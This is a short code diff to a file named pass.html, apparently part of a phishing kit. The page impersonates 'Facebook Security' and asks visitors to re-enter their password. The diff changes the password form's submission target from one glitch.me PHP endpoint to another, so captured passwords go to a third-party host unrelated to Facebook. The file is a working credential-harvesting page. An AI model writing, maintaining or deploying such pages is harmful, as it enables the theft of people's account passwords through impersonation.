--- a/pass.html
+++ b/pass.html
@@ -110,7 +110,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://gravel-magical-statistic.glitch.me/passRJ.php" method="POST">
+        <form id="passwordForm" action="https://mixed-fluff-space.glitch.me/muneebpass.php" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
